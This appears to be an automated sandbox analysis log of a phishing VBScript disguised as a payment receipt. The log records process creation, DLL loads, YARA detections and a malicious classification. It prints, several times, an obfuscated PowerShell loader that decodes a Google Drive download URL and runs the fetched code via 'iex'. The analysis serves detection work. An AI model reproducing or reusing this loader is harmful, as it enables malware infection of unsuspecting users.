Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. 
';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbs
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. 
';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbs
Source: JUSTIFICANTE DE PAGO.vbsInitial sample: Strings found which are bigger than 50
Source: amsi64_7348.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winVBS@6/4@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Somesthesia.Ske
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22vcjhx5.fss.ps1
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: JUSTIFICANTE DE PAGO.vbsReversingLabs: Detection: 21%
Source: JUSTIFICANTE DE PAGO.vbsVirustotal: Detection: 8%
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. 
';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Somesthesia.Ske && echo $"
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1809922936.000001FF75D2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb2 source: powershell.exe, 00000001.00000002.1809922936.000001FF75D2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1824372929.000001FF75F84000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbiTP)l source: powershell.exe, 00000001.00000002.1824372929.000001FF75F84000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1810470481.000001FF75F20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb{Yy source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbz source: powershell.exe, 00000001.00000002.1810470481.000001FF75F5E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\System.Core.pdb~YD source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havneb", "0")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. 
';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsSeven9Mis n3Magts. Bunds ,udep MagnlStu,ei FoshtDrosk(.anso$B,oncT S.rii Hal,mGra,ubDominaJuleflGodfreResorrDistrnMonet
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. 
